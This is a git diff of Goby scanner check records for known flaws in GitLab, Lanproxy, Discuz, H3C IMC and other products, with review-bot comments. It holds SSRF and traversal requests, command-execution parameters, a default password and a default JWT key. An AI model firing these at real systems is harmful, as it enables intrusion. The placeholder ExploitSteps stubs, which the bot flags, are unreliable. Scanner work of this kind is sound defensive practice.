"Description": "ClickHouse 存在着的接口由于没有鉴权则任意访问者都可以执行SQL语句获取数据.",
"GobyQuery": "banner=\"X-Clickhouse-Summary\" || port=\"8123\"",
"Description": "ClickHouse is an open-source column-oriented DBMS for online analytical processing that allows users to generate analytical reports using SQL queries in real-time.",
"Product": "ClickHouse",
"Homepage": "https://gobies.org/",
"Author": "aetkrad",
"Impact": "",
"Homepage": "https://clickhouse.com/",
"Author": "",
"Impact": "Clickhouse has unauthorized access and can perform SQL statements to get data.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -98,6 +98,43 @@
]
}
],
"PostTime": "2021-12-04 18:32:14",
"GobyVersion": "1.9.310"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -5,16 +5,16 @@
"rce"
],
"GobyQuery": "protocol=\"consul(http)\"",
"Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request",
"Description": "Consul is the control plane of the service mesh. Consul is a multi-networking tool that offers a fully-featured service mesh solution that solves the networking and security challenges of operating microservices and cloud infrastructure.",
"Product": "Consul",
"Homepage": "https://www.consul.io/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.",
"Recommendation": "",
"References": [
"https://www.exploit-db.com/exploits/46073"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -57,6 +57,43 @@
]
}
],
"PostTime": "2021-11-08 21:46:25",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -4,12 +4,12 @@
"Tags": [
"defaultaccount"
],
"GobyQuery": "(app=\"大唐电信AC集中管理平台\" | title=\"大唐电信AC集中管理平台\")",
"Description": "大唐AC集中管理平台默认密码admin/123456",
"Product": "大唐电信AC集中管理平台",
"GobyQuery": "app=\"大唐电信AC集中管理平台\" || title=\"大唐电信AC集中管理平台\"",
"Description": "",
"Product": "Datang Telecom AC centralized management platform",
"Homepage": "http://www.datang.com/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Datang AC centralized management platform default password admin/123456",
"Recommendation": "",
"References": [],
"HasExp": true,
@ -99,6 +99,6 @@
]
}
],
"PostTime": "2021-11-12 19:44:34",
"GobyVersion": "1.8.302"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -5,16 +5,16 @@
"FileInclude"
],
"GobyQuery": "app=\"DedeCMS\"",
"Description": "DedeCMS Carbuyaction.php页面存在本地文件包含漏洞",
"Description": "Dream Weaving (DedeCMS) Official Website- Content Management System- Shanghai Zhuozhuo Network Technology Co., Ltd.",
"Product": "DedeCMS",
"Homepage": "http://www.dedecms.com/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "DedeCMS Carbuyaction.php has a local file inclusion vulnerability.",
"Recommendation": "",
"References": [
"https://www.cnblogs.com/milantgh/p/3615986.html"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -88,6 +88,43 @@
]
}
],
"PostTime": "2021-11-13 14:18:50",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -4,17 +4,17 @@
"Tags": [
"rce"
],
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP导致$_REQUEST中不再包含$_COOKIE我们通过在Cookie中传入$GLOBALS来覆盖全局变量造成代码执行漏洞。",
"Product": "discuz",
"GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
"Product": "Discuz!",
"Homepage": "https://www.discuz.net/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Since the default value of request_order in the php.ini setting in php5.3.x version is GP, $_COOKIE is no longer included in $_REQUEST. We overwrite the global variable by passing in $GLOBALS in the cookie, resulting in a code execution vulnerability.",
"Recommendation": "",
"References": [
"https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -66,6 +66,43 @@
]
}
],
"PostTime": "2021-11-17 13:57:54",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -4,17 +4,17 @@
"Tags": [
"unauth"
],
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "由Discuz论坛官方微信登录插件产生攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号通过该漏洞创建的论坛账号具备一般用户的所有权限可以任意发帖回帖.",
"Product": "discuz",
"GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
"Product": "Discuz!",
"Homepage": "https://www.discuz.net/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Generated by the official WeChat login plug-in of Discuz Forum, attackers can use the vulnerability of this plug-in to bypass the forum's mailbox, mobile phone number and other verifications to illegally create a forum account. The forum account created through this vulnerability has all the permissions of ordinary users and can be arbitrarily Post a reply.",
"Recommendation": "",
"References": [
"https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -78,6 +78,43 @@
]
}
],
"PostTime": "2021-11-17 13:52:51",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -4,17 +4,17 @@
"Tags": [
"sqli"
],
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "discuz7.2论坛存在sql注入漏洞",
"Product": "Discuz",
"GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
"Product": "Discuz!",
"Homepage": "https://www.discuz.net/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Discuz7.2 has sql injection vulnerability.",
"Recommendation": "",
"References": [
"https://blog.csdn.net/weixin_40709439/article/details/82780606"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -64,6 +64,43 @@
]
}
],
"PostTime": "2021-11-16 17:48:16",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,20 +1,20 @@
{
"Name": "Docker Registry API Unauth",
"Level": "2",
"Level": "1",
"Tags": [
"unauth"
],
"GobyQuery": "header=\"registry/2.0\"",
"Description": "Docker Registry API 存在未授权访问漏洞黑客可通过API下载docker images导致敏感信息泄露。",
"Description": "Docker is a set of platform as a service products that use OS-level virtualization to deliver software in packages called containers.",
"Product": "Docker Registry",
"Homepage": "https://docs.docker.com/registry/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "There is an unauthorized access vulnerability in the Docker Registry API. Docker images can be downloaded through the API, resulting in the disclosure of sensitive information.",
"Recommendation": "",
"References": [
"https://www.freeaihub.com/post/6085.html"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -98,6 +98,43 @@
]
}
],
"PostTime": "2021-11-27 14:21:33",
"GobyVersion": "1.9.310"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
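Review bot: The `ExploitSteps` block added at the end of this record is an unedited template (`GET /test.php`, body contains `test`) that has nothing to do with the registry API, yet the first hunk flips `HasExp` to `true`. A record in this state advertises a verification step it does not have, so anyone triaging scan output cannot tell a confirmed finding from a stub result. Keep `"HasExp": false` and leave the block out until a reviewed step exists. The same template is added in the FineReport, RuoYi Druid and YAPI sections below, and the Discuz record at the top of this view shows it too.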


@ -1,15 +1,15 @@
{
"Name": "好视通云会议存在任意文件读取漏洞",
"Name": "Fastmeeting Arbitrary File Read",
"Level": "2",
"Tags": [
"fileread"
],
"GobyQuery": "body=\"深圳银澎云计算有限公司\"",
"Description": "好视通云会议存在任意文件读取漏洞",
"Product": "好视通云会议",
"Description": "hst",
"Product": "hst",
"Homepage": "https://www.hst.com/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Fastmeeting Arbitrary File Read",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA"
@ -100,6 +100,6 @@
]
}
],
"PostTime": "2021-12-11 14:50:39",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
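Review bot: `"Description": "hst"` and `"Product": "hst"` in the first hunk replace a readable statement of the issue with a bare abbreviation, and the new `Impact` only repeats the record name. A description along the lines of `"Fastmeeting (好视通) cloud conferencing is affected by an arbitrary file read vulnerability."` would keep what the old text said. The commit also overwrites `PostTime` with `0000-00-00 00:00:00`, `GobyVersion` with `0.0.0` and `Author` with an empty string here and in most other sections, which removes the provenance a defender needs to judge how old and how trustworthy a check is. The hard-coded-password record further down additionally ends up with empty `Description` and `Product`.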


@ -5,16 +5,16 @@
"overwrite"
],
"GobyQuery": "app=\"fanruansem-FineReport\"",
"Description": "由于在初始化svg文件时未对传入的参数做限制导致可以对已存在的文件覆盖写入数据从而通过将木马写入jsp文件中获取服务器权限",
"Product": "帆软-FineReport",
"Description": "FineReport is an web reporting tool.",
"Product": "fanruan-FineReport",
"Homepage": "https://www.fanruan.com/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Since there is no restriction on the incoming parameters when initializing the svg file, data can be overwritten to the existing file, so that the server permission can be obtained by writing the Trojan into the jsp file.",
"Recommendation": "",
"References": [
"https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -88,6 +88,43 @@
]
}
],
"PostTime": "2021-12-08 11:22:44",
"GobyVersion": "1.9.310"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,26 +1,35 @@
{
"Name": "GitLab SSRF CVE-2021-22214",
"Level": "3",
"Tags": [],
"GobyQuery": "app=\"GitLab\"",
"Description": "GitLab存在前台未授权SSRF漏洞未授权的攻击者也可以利用该漏洞执行SSRF攻击CVE-2021-22214。该漏洞源于对用户提供数据的验证不足远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。",
"Product": "Gitlab > 10.5",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
"Tags": [
"SSRF"
],
"HasExp": true,
"ExpParams": [
{
"name": "URL",
"type": "input",
"value": "test.dnslog.cn",
"show": ""
}
],
"GobyQuery": "app=\"GitLab\"",
"Description": "GitLab is The DevOps Platform.",
"Product": "GitLab",
"Homepage": "https://about.gitlab.com/",
"Author": "",
"Impact": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.",
"Recommendation": "",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-22214",
"https://nvd.nist.gov/vuln/detail/CVE-2021-39935",
"https://nvd.nist.gov/vuln/detail/CVE-2021-22175",
"https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html",
"https://docs.gitlab.com/ee/api/lint.html"
],
"HasExp": true,
"ExpParams": [
{
"Name": "URL",
"Type": "input",
"Value": "test.dnslog.cn"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -30,8 +39,7 @@
"follow_redirect": false,
"header": {
"Content-Type": "application/json",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Content-Length": ""
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
},
"data_type": "text",
"data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://test.dnslog.cn/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
@ -57,9 +65,45 @@
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/api/v4/ci/lint?include_merged_yaml=true",
"follow_redirect": true,
"header": {
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\"content\": \"include:\\n remote: http://127.0.0.1:9100/test.yml\"}",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "does not have valid YAML syntax",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -68,8 +112,7 @@
"follow_redirect": false,
"header": {
"Content-Type": "application/json",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Content-Length": ""
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
},
"data_type": "text",
"data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://{{{URL}}}/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
@ -95,10 +138,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-07-01 20:34:22",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
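Review bot: `"output|lastbody|undefined|undefined"` in the last hunk's `SetVariable` looks like a serializer artifact, with JavaScript `undefined` values stringified into the pipe-delimited spec. Other records in this commit write `"output|lastbody|regex|"`. If the engine reads the third field as an extraction mode, the literal `undefined` is presumably not a valid one, so the captured output may be dropped or mis-parsed. I would normalise it to `"output|lastbody|regex|"` (to be confirmed against the Goby record schema) and fix the conversion step that produced it. The same string appears in the H3C IMC, IceWarp and OpenSNS sections.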


@ -1,26 +1,32 @@
{
"Name": "H3C IMC远程命令执行",
"Name": "H3C IMC RCE",
"Level": "3",
"Tags": [],
"Tags": [
"rce"
],
"GobyQuery": "product=\"H3C-iMC\"",
"Description": "",
"Product": "H3C iMC 智能管理中心平台",
"Description": "H3C IMC",
"Product": "H3C IMC",
"Homepage": "http://www.h3c.com/cn/Products___Technology/Products/H3C_Soft/IT_Business/Resource/iMC_Flat",
"Author": "ying",
"Impact": "",
"Recommandation": "",
"Author": "",
"Impact": "A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw",
"https://www.t00ls.net/articles-60979.html"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"HasExp": true,
"ExpParams": [
{
"Name": "Cmd",
"Type": "input",
"Value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -57,8 +63,8 @@
},
"SetVariable": []
}
],
"ExploitSteps": [
],
"ExploitSteps": [
"AND",
{
"Request": {
@ -93,10 +99,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-05-28 10:06:39",
"GobyVersion": "1.8.268"
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,18 +1,18 @@
{
"Name": "IRDM4000 Smart station Unauthorized access",
"Level": "2",
"Tags": [],
"GobyQuery": "body=\"iRDM4000智慧站房在线监管\"",
"Description": "IRDM4000 unauthorized access vulnerability of userId=0",
"Product": "IRDM4000 Smart station",
"Homepage": "http://www.houtian-hb.com",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommendation": "",
"References": [
"https://gobies.org/"
"Tags": [
"unauthorized access"
],
"HasExp": true,
"GobyQuery": "body=\"iRDM4000智慧站房在线监管\"",
"Description": "IRDM4000 Smart station",
"Product": "IRDM4000 Smart station",
"Homepage": "http://www.houtian-hb.com/",
"Author": "",
"Impact": "IRDM4000 unauthorized access vulnerability of userId=0",
"Recommendation": "",
"References": [],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -64,43 +64,6 @@
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-10-26 10:55:38",
"GobyVersion": "1.9.304"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,26 +1,31 @@
{
"Name": "IceWarp WebClient basic RCE",
"Level": "3",
"Tags": [],
"GobyQuery": "body=\"Powered by IceWarp\"",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
"Tags": [
"rce"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "ipconfig",
"show": ""
}
],
"GobyQuery": "body=\"Powered by IceWarp\"",
"Description": "IceWarp",
"Product": "IceWarp",
"Homepage": "http://www.icewarp.cn/",
"Author": "",
"Impact": "IceWarp WebClient basic RCE",
"Recommendation": "",
"References": [
"https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"
],
"HasExp": true,
"ExpParams": [
{
"Name": "cmd",
"Type": "input",
"Value": "ipconfig"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -50,7 +55,7 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -77,10 +82,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-06-19 13:19:47",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,17 +1,23 @@
{
"Name": "极通EWEBSphpinfo泄露",
"Level": "3",
"Tags": [],
"Name": "Jitong EWEBS phpinfo leak",
"Level": "0",
"Tags": [
"infoleak"
],
"GobyQuery": "body=\"极通软件\"",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"Product": "Jitong EWEBS",
"Homepage": "http://www.n-soft.com.cn/",
"Author": "",
"Impact": "Jitong EWEBS phpinfo leak",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -19,7 +25,7 @@
"method": "GET",
"uri": "/testweb.php",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -39,6 +45,34 @@
"SetVariable": []
}
],
"PostTime": "2021-06-17 21:19:12",
"GobyVersion": "1.8.268"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/testweb.php",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "PHP Version",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -4,12 +4,12 @@
"Tags": [
"defaultaccount"
],
"GobyQuery": "(title==\"Konga\" | body=\"window.konga_version\")",
"Description": "Konga JWT默认key为oursecret可伪造任意用户权限。",
"GobyQuery": "title=\"Konga\" || body=\"window.konga_version\"",
"Description": "Konga offers the tools you need to manage your Kong cluster with ease.",
"Product": "Konga",
"Homepage": "https://github.com/pantsel/konga",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "The default key of Konga JWT is oursecret, which can forge arbitrary user permissions.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg"
@ -112,6 +112,6 @@
]
}
],
"PostTime": "2021-12-03 18:50:39",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,36 +1,44 @@
{
"Name": "Lanproxy目录遍历 CVE-2021-3019",
"Name": "Lanproxy Directory Traversal CVE-2021-3019",
"Level": "2",
"Tags": [],
"GobyQuery": "header= \"Server: LPS-0.1\"",
"Description": "lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具目前仅支持tcp流量转发可支持任何tcp上层协议ssh访问、web服务器访问、远程桌面...)。",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
"Tags": [
"Directory Traversal"
],
"HasExp": true,
"ExpParams": [
{
"name": "path",
"type": "input",
"value": "/../conf/config.properties",
"show": ""
}
],
"GobyQuery": "header=\"Server: LPS-0.1\"",
"Description": "Lanproxy is a reverse proxy to help you expose a local server behind a NAT or firewall to the internet. it supports any protocols over tcp (http https ssh ...)",
"Product": "ffay lanproxy 0.1",
"Homepage": "https://github.com/ffay/lanproxy",
"Author": "",
"Impact": "ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.",
"Recommendation": "",
"References": [
"https://github.com/ffay/lanproxy/commits/master",
"https://github.com/maybe-why-not/lanproxy/issues/1",
"https://nvd.nist.gov/vuln/detail/CVE-2021-3019"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Filename",
"Type": "select",
"Value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/../conf/config.properties",
"follow_redirect": false,
"header": {},
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": ""
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
@ -47,34 +55,7 @@
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "config.admin",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "{{{path}}}",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"value": "server.ssl",
"bz": ""
},
{
@ -87,10 +68,40 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-06-24 17:23:13",
"GobyVersion": "1.8.268"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "{{{Filename}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,28 +1,32 @@
{
"Name": "OpenSNS 远程代码执行漏洞",
"Name": "OpenSNS RCE",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "body=\"opensns\"",
"Description": "OpenSNS是想天科技开发的一款综合性社交软件存在命令执行漏洞且是administrator",
"Description": "OpenSNS is a comprehensive social software developed by Xiangtian Technology.",
"Product": "OpenSNS",
"Homepage": "http://www.opensns.cn/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"Author": "",
"Impact": "A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.",
"Recommendation": "",
"References": [
"https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn"
"http://www.0dayhack.net/index.php/2417/",
"https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"HasExp": true,
"ExpParams": [
{
"Name": "Cmd",
"Type": "input",
"Value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -30,7 +34,7 @@
"method": "GET",
